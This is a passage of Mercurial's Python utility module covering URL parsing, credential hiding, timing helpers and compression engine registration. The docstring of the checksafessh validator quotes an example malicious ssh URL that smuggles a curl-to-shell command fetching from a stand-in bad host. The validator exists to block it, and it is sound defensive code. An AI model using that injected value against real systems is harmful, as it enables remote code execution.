2713 2713 """Return the result of interpolating items in the mapping into string s.
2714 2714
2715 2715 prefix is a single character string, or a two character string with
2716 2716 a backslash as the first character if the prefix needs to be escaped in
2717 2717 a regular expression.
2718 2718
2719 2719 fn is an optional function that will be applied to the replacement text
2720 2720 just before replacement.
2721 2721
2722 2722 escape_prefix is an optional flag that allows using doubled prefix for
2723 2723 its escaping.
2724 2724 """
2725 2725 fn = fn or (lambda s: s)
2726 2726 patterns = '|'.join(mapping.keys())
2727 2727 if escape_prefix:
2728 2728 patterns += '|' + prefix
2729 2729 if len(prefix) > 1:
2730 2730 prefix_char = prefix[1:]
2731 2731 else:
2732 2732 prefix_char = prefix
2733 2733 mapping[prefix_char] = prefix_char
2734 2734 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2735 2735 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2736 2736
2737 2737 def getport(port):
2738 2738 """Return the port for a given network service.
2739 2739
2740 2740 If port is an integer, it's returned as is. If it's a string, it's
2741 2741 looked up using socket.getservbyname(). If there's no matching
2742 2742 service, error.Abort is raised.
2743 2743 """
2744 2744 try:
2745 2745 return int(port)
2746 2746 except ValueError:
2747 2747 pass
2748 2748
2749 2749 try:
2750 2750 return socket.getservbyname(pycompat.sysstr(port))
2751 2751 except socket.error:
2752 2752 raise Abort(_("no port number associated with service '%s'") % port)
2753 2753
2754 2754 _booleans = {'1': True, 'yes': True, 'true': True, 'on': True, 'always': True,
2755 2755 '0': False, 'no': False, 'false': False, 'off': False,
2756 2756 'never': False}
2757 2757
2758 2758 def parsebool(s):
2759 2759 """Parse s into a boolean.
2760 2760
2761 2761 If s is not a valid boolean, returns None.
2762 2762 """
2763 2763 return _booleans.get(s.lower(), None)
2764 2764
2765 2765 _hextochr = dict((a + b, chr(int(a + b, 16)))
2766 2766 for a in string.hexdigits for b in string.hexdigits)
2767 2767
2768 2768 class url(object):
2769 2769 r"""Reliable URL parser.
2770 2770
2771 2771 This parses URLs and provides attributes for the following
2772 2772 components:
2773 2773
2774 2774 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2775 2775
2776 2776 Missing components are set to None. The only exception is
2777 2777 fragment, which is set to '' if present but empty.
2778 2778
2779 2779 If parsefragment is False, fragment is included in query. If
2780 2780 parsequery is False, query is included in path. If both are
2781 2781 False, both fragment and query are included in path.
2782 2782
2783 2783 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2784 2784
2785 2785 Note that for backward compatibility reasons, bundle URLs do not
2786 2786 take host names. That means 'bundle://../' has a path of '../'.
2787 2787
2788 2788 Examples:
2789 2789
2790 2790 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2791 2791 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2792 2792 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2793 2793 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2794 2794 >>> url(b'file:///home/joe/repo')
2795 2795 <url scheme: 'file', path: '/home/joe/repo'>
2796 2796 >>> url(b'file:///c:/temp/foo/')
2797 2797 <url scheme: 'file', path: 'c:/temp/foo/'>
2798 2798 >>> url(b'bundle:foo')
2799 2799 <url scheme: 'bundle', path: 'foo'>
2800 2800 >>> url(b'bundle://../foo')
2801 2801 <url scheme: 'bundle', path: '../foo'>
2802 2802 >>> url(br'c:\foo\bar')
2803 2803 <url path: 'c:\\foo\\bar'>
2804 2804 >>> url(br'\\blah\blah\blah')
2805 2805 <url path: '\\\\blah\\blah\\blah'>
2806 2806 >>> url(br'\\blah\blah\blah#baz')
2807 2807 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2808 2808 >>> url(br'file:///C:\users\me')
2809 2809 <url scheme: 'file', path: 'C:\\users\\me'>
2810 2810
2811 2811 Authentication credentials:
2812 2812
2813 2813 >>> url(b'ssh://joe:xyz@x/repo')
2814 2814 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2815 2815 >>> url(b'ssh://joe@x/repo')
2816 2816 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2817 2817
2818 2818 Query strings and fragments:
2819 2819
2820 2820 >>> url(b'http://host/a?b#c')
2821 2821 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2822 2822 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2823 2823 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2824 2824
2825 2825 Empty path:
2826 2826
2827 2827 >>> url(b'')
2828 2828 <url path: ''>
2829 2829 >>> url(b'#a')
2830 2830 <url path: '', fragment: 'a'>
2831 2831 >>> url(b'http://host/')
2832 2832 <url scheme: 'http', host: 'host', path: ''>
2833 2833 >>> url(b'http://host/#a')
2834 2834 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2835 2835
2836 2836 Only scheme:
2837 2837
2838 2838 >>> url(b'http:')
2839 2839 <url scheme: 'http'>
2840 2840 """
2841 2841
2842 2842 _safechars = "!~*'()+"
2843 2843 _safepchars = "/!~*'()+:\\"
2844 2844 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2845 2845
2846 2846 def __init__(self, path, parsequery=True, parsefragment=True):
2847 2847 # We slowly chomp away at path until we have only the path left
2848 2848 self.scheme = self.user = self.passwd = self.host = None
2849 2849 self.port = self.path = self.query = self.fragment = None
2850 2850 self._localpath = True
2851 2851 self._hostport = ''
2852 2852 self._origpath = path
2853 2853
2854 2854 if parsefragment and '#' in path:
2855 2855 path, self.fragment = path.split('#', 1)
2856 2856
2857 2857 # special case for Windows drive letters and UNC paths
2858 2858 if hasdriveletter(path) or path.startswith('\\\\'):
2859 2859 self.path = path
2860 2860 return
2861 2861
2862 2862 # For compatibility reasons, we can't handle bundle paths as
2863 2863 # normal URLS
2864 2864 if path.startswith('bundle:'):
2865 2865 self.scheme = 'bundle'
2866 2866 path = path[7:]
2867 2867 if path.startswith('//'):
2868 2868 path = path[2:]
2869 2869 self.path = path
2870 2870 return
2871 2871
2872 2872 if self._matchscheme(path):
2873 2873 parts = path.split(':', 1)
2874 2874 if parts[0]:
2875 2875 self.scheme, path = parts
2876 2876 self._localpath = False
2877 2877
2878 2878 if not path:
2879 2879 path = None
2880 2880 if self._localpath:
2881 2881 self.path = ''
2882 2882 return
2883 2883 else:
2884 2884 if self._localpath:
2885 2885 self.path = path
2886 2886 return
2887 2887
2888 2888 if parsequery and '?' in path:
2889 2889 path, self.query = path.split('?', 1)
2890 2890 if not path:
2891 2891 path = None
2892 2892 if not self.query:
2893 2893 self.query = None
2894 2894
2895 2895 # // is required to specify a host/authority
2896 2896 if path and path.startswith('//'):
2897 2897 parts = path[2:].split('/', 1)
2898 2898 if len(parts) > 1:
2899 2899 self.host, path = parts
2900 2900 else:
2901 2901 self.host = parts[0]
2902 2902 path = None
2903 2903 if not self.host:
2904 2904 self.host = None
2905 2905 # path of file:///d is /d
2906 2906 # path of file:///d:/ is d:/, not /d:/
2907 2907 if path and not hasdriveletter(path):
2908 2908 path = '/' + path
2909 2909
2910 2910 if self.host and '@' in self.host:
2911 2911 self.user, self.host = self.host.rsplit('@', 1)
2912 2912 if ':' in self.user:
2913 2913 self.user, self.passwd = self.user.split(':', 1)
2914 2914 if not self.host:
2915 2915 self.host = None
2916 2916
2917 2917 # Don't split on colons in IPv6 addresses without ports
2918 2918 if (self.host and ':' in self.host and
2919 2919 not (self.host.startswith('[') and self.host.endswith(']'))):
2920 2920 self._hostport = self.host
2921 2921 self.host, self.port = self.host.rsplit(':', 1)
2922 2922 if not self.host:
2923 2923 self.host = None
2924 2924
2925 2925 if (self.host and self.scheme == 'file' and
2926 2926 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2927 2927 raise Abort(_('file:// URLs can only refer to localhost'))
2928 2928
2929 2929 self.path = path
2930 2930
2931 2931 # leave the query string escaped
2932 2932 for a in ('user', 'passwd', 'host', 'port',
2933 2933 'path', 'fragment'):
2934 2934 v = getattr(self, a)
2935 2935 if v is not None:
2936 2936 setattr(self, a, urlreq.unquote(v))
2937 2937
2938 2938 @encoding.strmethod
2939 2939 def __repr__(self):
2940 2940 attrs = []
2941 2941 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2942 2942 'query', 'fragment'):
2943 2943 v = getattr(self, a)
2944 2944 if v is not None:
2945 2945 attrs.append('%s: %r' % (a, v))
2946 2946 return '<url %s>' % ', '.join(attrs)
2947 2947
2948 2948 def __bytes__(self):
2949 2949 r"""Join the URL's components back into a URL string.
2950 2950
2951 2951 Examples:
2952 2952
2953 2953 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2954 2954 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2955 2955 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2956 2956 'http://user:pw@host:80/?foo=bar&baz=42'
2957 2957 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2958 2958 'http://user:pw@host:80/?foo=bar%3dbaz'
2959 2959 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2960 2960 'ssh://user:pw@[::1]:2200//home/joe#'
2961 2961 >>> bytes(url(b'http://localhost:80//'))
2962 2962 'http://localhost:80//'
2963 2963 >>> bytes(url(b'http://localhost:80/'))
2964 2964 'http://localhost:80/'
2965 2965 >>> bytes(url(b'http://localhost:80'))
2966 2966 'http://localhost:80/'
2967 2967 >>> bytes(url(b'bundle:foo'))
2968 2968 'bundle:foo'
2969 2969 >>> bytes(url(b'bundle://../foo'))
2970 2970 'bundle:../foo'
2971 2971 >>> bytes(url(b'path'))
2972 2972 'path'
2973 2973 >>> bytes(url(b'file:///tmp/foo/bar'))
2974 2974 'file:///tmp/foo/bar'
2975 2975 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2976 2976 'file:///c:/tmp/foo/bar'
2977 2977 >>> print(url(br'bundle:foo\bar'))
2978 2978 bundle:foo\bar
2979 2979 >>> print(url(br'file:///D:\data\hg'))
2980 2980 file:///D:\data\hg
2981 2981 """
2982 2982 if self._localpath:
2983 2983 s = self.path
2984 2984 if self.scheme == 'bundle':
2985 2985 s = 'bundle:' + s
2986 2986 if self.fragment:
2987 2987 s += '#' + self.fragment
2988 2988 return s
2989 2989
2990 2990 s = self.scheme + ':'
2991 2991 if self.user or self.passwd or self.host:
2992 2992 s += '//'
2993 2993 elif self.scheme and (not self.path or self.path.startswith('/')
2994 2994 or hasdriveletter(self.path)):
2995 2995 s += '//'
2996 2996 if hasdriveletter(self.path):
2997 2997 s += '/'
2998 2998 if self.user:
2999 2999 s += urlreq.quote(self.user, safe=self._safechars)
3000 3000 if self.passwd:
3001 3001 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
3002 3002 if self.user or self.passwd:
3003 3003 s += '@'
3004 3004 if self.host:
3005 3005 if not (self.host.startswith('[') and self.host.endswith(']')):
3006 3006 s += urlreq.quote(self.host)
3007 3007 else:
3008 3008 s += self.host
3009 3009 if self.port:
3010 3010 s += ':' + urlreq.quote(self.port)
3011 3011 if self.host:
3012 3012 s += '/'
3013 3013 if self.path:
3014 3014 # TODO: similar to the query string, we should not unescape the
3015 3015 # path when we store it, the path might contain '%2f' = '/',
3016 3016 # which we should *not* escape.
3017 3017 s += urlreq.quote(self.path, safe=self._safepchars)
3018 3018 if self.query:
3019 3019 # we store the query in escaped form.
3020 3020 s += '?' + self.query
3021 3021 if self.fragment is not None:
3022 3022 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
3023 3023 return s
3024 3024
3025 3025 __str__ = encoding.strmethod(__bytes__)
3026 3026
3027 3027 def authinfo(self):
3028 3028 user, passwd = self.user, self.passwd
3029 3029 try:
3030 3030 self.user, self.passwd = None, None
3031 3031 s = bytes(self)
3032 3032 finally:
3033 3033 self.user, self.passwd = user, passwd
3034 3034 if not self.user:
3035 3035 return (s, None)
3036 3036 # authinfo[1] is passed to urllib2 password manager, and its
3037 3037 # URIs must not contain credentials. The host is passed in the
3038 3038 # URIs list because Python < 2.4.3 uses only that to search for
3039 3039 # a password.
3040 3040 return (s, (None, (s, self.host),
3041 3041 self.user, self.passwd or ''))
3042 3042
3043 3043 def isabs(self):
3044 3044 if self.scheme and self.scheme != 'file':
3045 3045 return True # remote URL
3046 3046 if hasdriveletter(self.path):
3047 3047 return True # absolute for our purposes - can't be joined()
3048 3048 if self.path.startswith(br'\\'):
3049 3049 return True # Windows UNC path
3050 3050 if self.path.startswith('/'):
3051 3051 return True # POSIX-style
3052 3052 return False
3053 3053
3054 3054 def localpath(self):
3055 3055 if self.scheme == 'file' or self.scheme == 'bundle':
3056 3056 path = self.path or '/'
3057 3057 # For Windows, we need to promote hosts containing drive
3058 3058 # letters to paths with drive letters.
3059 3059 if hasdriveletter(self._hostport):
3060 3060 path = self._hostport + '/' + self.path
3061 3061 elif (self.host is not None and self.path
3062 3062 and not hasdriveletter(path)):
3063 3063 path = '/' + path
3064 3064 return path
3065 3065 return self._origpath
3066 3066
3067 3067 def islocal(self):
3068 3068 '''whether localpath will return something that posixfile can open'''
3069 3069 return (not self.scheme or self.scheme == 'file'
3070 3070 or self.scheme == 'bundle')
3071 3071
3072 3072 def hasscheme(path):
3073 3073 return bool(url(path).scheme)
3074 3074
3075 3075 def hasdriveletter(path):
3076 3076 return path and path[1:2] == ':' and path[0:1].isalpha()
3077 3077
3078 3078 def urllocalpath(path):
3079 3079 return url(path, parsequery=False, parsefragment=False).localpath()
3080 3080
3081 3081 def checksafessh(path):
3082 3082 """check if a path / url is a potentially unsafe ssh exploit (SEC)
3083 3083
3084 3084 This is a sanity check for ssh urls. ssh will parse the first item as
3085 3085 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
3086 3086 Let's prevent these potentially exploited urls entirely and warn the
3087 3087 user.
3088 3088
3089 3089 Raises an error.Abort when the url is unsafe.
3090 3090 """
3091 3091 path = urlreq.unquote(path)
3092 3092 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
3093 3093 raise error.Abort(_('potentially unsafe url: %r') %
3094 3094 (path,))
3095 3095
3096 3096 def hidepassword(u):
3097 3097 '''hide user credential in a url string'''
3098 3098 u = url(u)
3099 3099 if u.passwd:
3100 3100 u.passwd = '***'
3101 3101 return bytes(u)
3102 3102
3103 3103 def removeauth(u):
3104 3104 '''remove all authentication information from a url string'''
3105 3105 u = url(u)
3106 3106 u.user = u.passwd = None
3107 3107 return str(u)
3108 3108
3109 3109 timecount = unitcountfn(
3110 3110 (1, 1e3, _('%.0f s')),
3111 3111 (100, 1, _('%.1f s')),
3112 3112 (10, 1, _('%.2f s')),
3113 3113 (1, 1, _('%.3f s')),
3114 3114 (100, 0.001, _('%.1f ms')),
3115 3115 (10, 0.001, _('%.2f ms')),
3116 3116 (1, 0.001, _('%.3f ms')),
3117 3117 (100, 0.000001, _('%.1f us')),
3118 3118 (10, 0.000001, _('%.2f us')),
3119 3119 (1, 0.000001, _('%.3f us')),
3120 3120 (100, 0.000000001, _('%.1f ns')),
3121 3121 (10, 0.000000001, _('%.2f ns')),
3122 3122 (1, 0.000000001, _('%.3f ns')),
3123 3123 )
3124 3124
3125 3125 _timenesting = [0]
3126 3126
3127 3127 def timed(func):
3128 3128 '''Report the execution time of a function call to stderr.
3129 3129
3130 3130 During development, use as a decorator when you need to measure
3131 3131 the cost of a function, e.g. as follows:
3132 3132
3133 3133 @util.timed
3134 3134 def foo(a, b, c):
3135 3135 pass
3136 3136 '''
3137 3137
3138 3138 def wrapper(*args, **kwargs):
3139 3139 start = timer()
3140 3140 indent = 2
3141 3141 _timenesting[0] += indent
3142 3142 try:
3143 3143 return func(*args, **kwargs)
3144 3144 finally:
3145 3145 elapsed = timer() - start
3146 3146 _timenesting[0] -= indent
3147 3147 stderr.write('%s%s: %s\n' %
3148 3148 (' ' * _timenesting[0], func.__name__,
3149 3149 timecount(elapsed)))
3150 3150 return wrapper
3151 3151
3152 3152 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3153 3153 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3154 3154
3155 3155 def sizetoint(s):
3156 3156 '''Convert a space specifier to a byte count.
3157 3157
3158 3158 >>> sizetoint(b'30')
3159 3159 30
3160 3160 >>> sizetoint(b'2.2kb')
3161 3161 2252
3162 3162 >>> sizetoint(b'6M')
3163 3163 6291456
3164 3164 '''
3165 3165 t = s.strip().lower()
3166 3166 try:
3167 3167 for k, u in _sizeunits:
3168 3168 if t.endswith(k):
3169 3169 return int(float(t[:-len(k)]) * u)
3170 3170 return int(t)
3171 3171 except ValueError:
3172 3172 raise error.ParseError(_("couldn't parse size: %s") % s)
3173 3173
3174 3174 class hooks(object):
3175 3175 '''A collection of hook functions that can be used to extend a
3176 3176 function's behavior. Hooks are called in lexicographic order,
3177 3177 based on the names of their sources.'''
3178 3178
3179 3179 def __init__(self):
3180 3180 self._hooks = []
3181 3181
3182 3182 def add(self, source, hook):
3183 3183 self._hooks.append((source, hook))
3184 3184
3185 3185 def __call__(self, *args):
3186 3186 self._hooks.sort(key=lambda x: x[0])
3187 3187 results = []
3188 3188 for source, hook in self._hooks:
3189 3189 results.append(hook(*args))
3190 3190 return results
3191 3191
3192 3192 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
3193 3193 '''Yields lines for a nicely formatted stacktrace.
3194 3194 Skips the 'skip' last entries, then return the last 'depth' entries.
3195 3195 Each file+linenumber is formatted according to fileline.
3196 3196 Each line is formatted according to line.
3197 3197 If line is None, it yields:
3198 3198 length of longest filepath+line number,
3199 3199 filepath+linenumber,
3200 3200 function
3201 3201
3202 3202 Not be used in production code but very convenient while developing.
3203 3203 '''
3204 3204 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3205 3205 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3206 3206 ][-depth:]
3207 3207 if entries:
3208 3208 fnmax = max(len(entry[0]) for entry in entries)
3209 3209 for fnln, func in entries:
3210 3210 if line is None:
3211 3211 yield (fnmax, fnln, func)
3212 3212 else:
3213 3213 yield line % (fnmax, fnln, func)
3214 3214
3215 3215 def debugstacktrace(msg='stacktrace', skip=0,
3216 3216 f=stderr, otherf=stdout, depth=0):
3217 3217 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3218 3218 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3219 3219 By default it will flush stdout first.
3220 3220 It can be used everywhere and intentionally does not require an ui object.
3221 3221 Not be used in production code but very convenient while developing.
3222 3222 '''
3223 3223 if otherf:
3224 3224 otherf.flush()
3225 3225 f.write('%s at:\n' % msg.rstrip())
3226 3226 for line in getstackframes(skip + 1, depth=depth):
3227 3227 f.write(line)
3228 3228 f.flush()
3229 3229
3230 3230 class dirs(object):
3231 3231 '''a multiset of directory names from a dirstate or manifest'''
3232 3232
3233 3233 def __init__(self, map, skip=None):
3234 3234 self._dirs = {}
3235 3235 addpath = self.addpath
3236 3236 if safehasattr(map, 'iteritems') and skip is not None:
3237 3237 for f, s in map.iteritems():
3238 3238 if s[0] != skip:
3239 3239 addpath(f)
3240 3240 else:
3241 3241 for f in map:
3242 3242 addpath(f)
3243 3243
3244 3244 def addpath(self, path):
3245 3245 dirs = self._dirs
3246 3246 for base in finddirs(path):
3247 3247 if base in dirs:
3248 3248 dirs[base] += 1
3249 3249 return
3250 3250 dirs[base] = 1
3251 3251
3252 3252 def delpath(self, path):
3253 3253 dirs = self._dirs
3254 3254 for base in finddirs(path):
3255 3255 if dirs[base] > 1:
3256 3256 dirs[base] -= 1
3257 3257 return
3258 3258 del dirs[base]
3259 3259
3260 3260 def __iter__(self):
3261 3261 return iter(self._dirs)
3262 3262
3263 3263 def __contains__(self, d):
3264 3264 return d in self._dirs
3265 3265
3266 3266 if safehasattr(parsers, 'dirs'):
3267 3267 dirs = parsers.dirs
3268 3268
3269 3269 def finddirs(path):
3270 3270 pos = path.rfind('/')
3271 3271 while pos != -1:
3272 3272 yield path[:pos]
3273 3273 pos = path.rfind('/', 0, pos)
3274 3274
3275 3275 # compression code
3276 3276
3277 3277 SERVERROLE = 'server'
3278 3278 CLIENTROLE = 'client'
3279 3279
3280 3280 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3281 3281 (u'name', u'serverpriority',
3282 3282 u'clientpriority'))
3283 3283
3284 3284 class compressormanager(object):
3285 3285 """Holds registrations of various compression engines.
3286 3286
3287 3287 This class essentially abstracts the differences between compression
3288 3288 engines to allow new compression formats to be added easily, possibly from
3289 3289 extensions.
3290 3290
3291 3291 Compressors are registered against the global instance by calling its
3292 3292 ``register()`` method.
3293 3293 """
3294 3294 def __init__(self):
3295 3295 self._engines = {}
3296 3296 # Bundle spec human name to engine name.
3297 3297 self._bundlenames = {}
3298 3298 # Internal bundle identifier to engine name.
3299 3299 self._bundletypes = {}
3300 3300 # Revlog header to engine name.
3301 3301 self._revlogheaders = {}
3302 3302 # Wire proto identifier to engine name.
3303 3303 self._wiretypes = {}
3304 3304
3305 3305 def __getitem__(self, key):
3306 3306 return self._engines[key]
3307 3307
3308 3308 def __contains__(self, key):
3309 3309 return key in self._engines
3310 3310
3311 3311 def __iter__(self):
3312 3312 return iter(self._engines.keys())
3313 3313
3314 3314 def register(self, engine):
3315 3315 """Register a compression engine with the manager.
3316 3316
3317 3317 The argument must be a ``compressionengine`` instance.
3318 3318 """
3319 3319 if not isinstance(engine, compressionengine):
3320 3320 raise ValueError(_('argument must be a compressionengine'))
3321 3321
3322 3322 name = engine.name()
3323 3323
3324 3324 if name in self._engines:
3325 3325 raise error.Abort(_('compression engine %s already registered') %
3326 3326 name)
3327 3327
3328 3328 bundleinfo = engine.bundletype()
3329 3329 if bundleinfo:
3330 3330 bundlename, bundletype = bundleinfo
3331 3331
3332 3332 if bundlename in self._bundlenames:
3333 3333 raise error.Abort(_('bundle name %s already registered') %
3334 3334 bundlename)
3335 3335 if bundletype in self._bundletypes:
3336 3336 raise error.Abort(_('bundle type %s already registered by %s') %
3337 3337 (bundletype, self._bundletypes[bundletype]))
3338 3338
3339 3339 # No external facing name declared.
3340 3340 if bundlename:
3341 3341 self._bundlenames[bundlename] = name
3342 3342
3343 3343 self._bundletypes[bundletype] = name
3344 3344
3345 3345 wiresupport = engine.wireprotosupport()
3346 3346 if wiresupport:
3347 3347 wiretype = wiresupport.name
3348 3348 if wiretype in self._wiretypes:
3349 3349 raise error.Abort(_('wire protocol compression %s already '
3350 3350 'registered by %s') %
3351 3351 (wiretype, self._wiretypes[wiretype]))
3352 3352
3353 3353 self._wiretypes[wiretype] = name
3354 3354
3355 3355 revlogheader = engine.revlogheader()
3356 3356 if revlogheader and revlogheader in self._revlogheaders:
3357 3357 raise error.Abort(_('revlog header %s already registered by %s') %
3358 3358 (revlogheader, self._revlogheaders[revlogheader]))
3359 3359
3360 3360 if revlogheader:
3361 3361 self._revlogheaders[revlogheader] = name
3362 3362
3363 3363 self._engines[name] = engine
3364 3364
3365 3365 @property
3366 3366 def supportedbundlenames(self):
3367 3367 return set(self._bundlenames.keys())
3368 3368
3369 3369 @property
3370 3370 def supportedbundletypes(self):
3371 3371 return set(self._bundletypes.keys())
3372 3372
3373 3373 def forbundlename(self, bundlename):
3374 3374 """Obtain a compression engine registered to a bundle name.
3375 3375
3376 3376 Will raise KeyError if the bundle type isn't registered.
3377 3377
3378 3378 Will abort if the engine is known but not available.
3379 3379 """
3380 3380 engine = self._engines[self._bundlenames[bundlename]]
3381 3381 if not engine.available():
3382 3382 raise error.Abort(_('compression engine %s could not be loaded') %
3383 3383 engine.name())
3384 3384 return engine
3385 3385
3386 3386 def forbundletype(self, bundletype):
3387 3387 """Obtain a compression engine registered to a bundle type.
3388 3388
3389 3389 Will raise KeyError if the bundle type isn't registered.
3390 3390
3391 3391 Will abort if the engine is known but not available.
3392 3392 """
3393 3393 engine = self._engines[self._bundletypes[bundletype]]
3394 3394 if not engine.available():
3395 3395 raise error.Abort(_('compression engine %s could not be loaded') %
3396 3396 engine.name())
3397 3397 return engine
3398 3398
3399 3399 def supportedwireengines(self, role, onlyavailable=True):
3400 3400 """Obtain compression engines that support the wire protocol.
3401 3401
3402 3402 Returns a list of engines in prioritized order, most desired first.
3403 3403
3404 3404 If ``onlyavailable`` is set, filter out engines that can't be
3405 3405 loaded.
3406 3406 """
3407 3407 assert role in (SERVERROLE, CLIENTROLE)
3408 3408
3409 3409 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3410 3410
3411 3411 engines = [self._engines[e] for e in self._wiretypes.values()]
3412 3412 if onlyavailable:
3413 3413 engines = [e for e in engines if e.available()]
3414 3414
3415 3415 def getkey(e):
3416 3416 # Sort first by priority, highest first. In case of tie, sort
3417 3417 # alphabetically. This is arbitrary, but ensures output is
3418 3418 # stable.
3419 3419 w = e.wireprotosupport()
3420 3420 return -1 * getattr(w, attr), w.name
3421 3421
3422 3422 return list(sorted(engines, key=getkey))
3423 3423
3424 3424 def forwiretype(self, wiretype):
3425 3425 engine = self._engines[self._wiretypes[wiretype]]
3426 3426 if not engine.available():
3427 3427 raise error.Abort(_('compression engine %s could not be loaded') %
3428 3428 engine.name())
3429 3429 return engine
3430 3430
3431 3431 def forrevlogheader(self, header):
3432 3432 """Obtain a compression engine registered to a revlog header.
3433 3433
3434 3434 Will raise KeyError if the revlog header value isn't registered.
3435 3435 """
3436 3436 return self._engines[self._revlogheaders[header]]
3437 3437
3438 3438 compengines = compressormanager()
3439 3439
3440 3440 class compressionengine(object):
3441 3441 """Base class for compression engines.
3442 3442
3443 3443 Compression engines must implement the interface defined by this class.
3444 3444 """
3445 3445 def name(self):
3446 3446 """Returns the name of the compression engine.
3447 3447
3448 3448 This is the key the engine is registered under.
3449 3449
3450 3450 This method must be implemented.
3451 3451 """
3452 3452 raise NotImplementedError()
3453 3453
3454 3454 def available(self):
3455 3455 """Whether the compression engine is available.
3456 3456
3457 3457 The intent of this method is to allow optional compression engines
3458 3458 that may not be available in all installations (such as engines relying
3459 3459 on C extensions that may not be present).
3460 3460 """
3461 3461 return True
3462 3462
3463 3463 def bundletype(self):
3464 3464 """Describes bundle identifiers for this engine.
3465 3465
3466 3466 If this compression engine isn't supported for bundles, returns None.
3467 3467
3468 3468 If this engine can be used for bundles, returns a 2-tuple of strings of
3469 3469 the user-facing "bundle spec" compression name and an internal
3470 3470 identifier used to denote the compression format within bundles. To
3471 3471 exclude the name from external usage, set the first element to ``None``.
3472 3472
3473 3473 If bundle compression is supported, the class must also implement
3474 3474 ``compressstream`` and `decompressorreader``.
3475 3475
3476 3476 The docstring of this method is used in the help system to tell users
3477 3477 about this engine.
3478 3478 """
3479 3479 return None
3480 3480
3481 3481 def wireprotosupport(self):
3482 3482 """Declare support for this compression format on the wire protocol.
3483 3483
3484 3484 If this compression engine isn't supported for compressing wire
3485 3485 protocol payloads, returns None.
3486 3486
3487 3487 Otherwise, returns ``compenginewireprotosupport`` with the following
3488 3488 fields:
3489 3489
3490 3490 * String format identifier
3491 3491 * Integer priority for the server
3492 3492 * Integer priority for the client
3493 3493
3494 3494 The integer priorities are used to order the advertisement of format
3495 3495 support by server and client. The highest integer is advertised
3496 3496 first. Integers with non-positive values aren't advertised.
3497 3497
3498 3498 The priority values are somewhat arbitrary and only used for default
3499 3499 ordering. The relative order can be changed via config options.
3500 3500
3501 3501 If wire protocol compression is supported, the class must also implement
3502 3502 ``compressstream`` and ``decompressorreader``.
3503 3503 """
3504 3504 return None
3505 3505
3506 3506 def revlogheader(self):
3507 3507 """Header added to revlog chunks that identifies this engine.
3508 3508
3509 3509 If this engine can be used to compress revlogs, this method should
3510 3510 return the bytes used to identify chunks compressed with this engine.
3511 3511 Else, the method should return ``None`` to indicate it does not
3512 3512 participate in revlog compression.
3513 3513 """
3514 3514 return None
3515 3515
3516 3516 def compressstream(self, it, opts=None):
3517 3517 """Compress an iterator of chunks.
3518 3518
3519 3519 The method receives an iterator (ideally a generator) of chunks of
3520 3520 bytes to be compressed. It returns an iterator (ideally a generator)
3521 3521 of bytes of chunks representing the compressed output.
3522 3522
3523 3523 Optionally accepts an argument defining how to perform compression.
3524 3524 Each engine treats this argument differently.
3525 3525 """
3526 3526 raise NotImplementedError()
3527 3527
3528 3528 def decompressorreader(self, fh):
3529 3529 """Perform decompression on a file object.
3530 3530
3531 3531 Argument is an object with a ``read(size)`` method that returns
3532 3532 compressed data. Return value is an object with a ``read(size)`` that
3533 3533 returns uncompressed data.
3534 3534 """
3535 3535 raise NotImplementedError()
3536 3536
3537 3537 def revlogcompressor(self, opts=None):
3538 3538 """Obtain an object that can be used to compress revlog entries.
3539 3539
3540 3540 The object has a ``compress(data)`` method that compresses binary
3541 3541 data. This method returns compressed binary data or ``None`` if
3542 3542 the data could not be compressed (too small, not compressible, etc).
3543 3543 The returned data should have a header uniquely identifying this
3544 3544 compression format so decompression can be routed to this engine.
3545 3545 This header should be identified by the ``revlogheader()`` return
3546 3546 value.
3547 3547
3548 3548 The object has a ``decompress(data)`` method that decompresses
3549 3549 data. The method will only be called if ``data`` begins with
3550 3550 ``revlogheader()``. The method should return the raw, uncompressed
3551 3551 data or raise a ``RevlogError``.
3552 3552
3553 3553 The object is reusable but is not thread safe.
3554 3554 """
3555 3555 raise NotImplementedError()
3556 3556
3557 3557 class _zlibengine(compressionengine):
3558 3558 def name(self):
3559 3559 return 'zlib'
3560 3560
3561 3561 def bundletype(self):
3562 3562 """zlib compression using the DEFLATE algorithm.
3563 3563
3564 3564 All Mercurial clients should support this format. The compression
3565 3565 algorithm strikes a reasonable balance between compression ratio
3566 3566 and size.
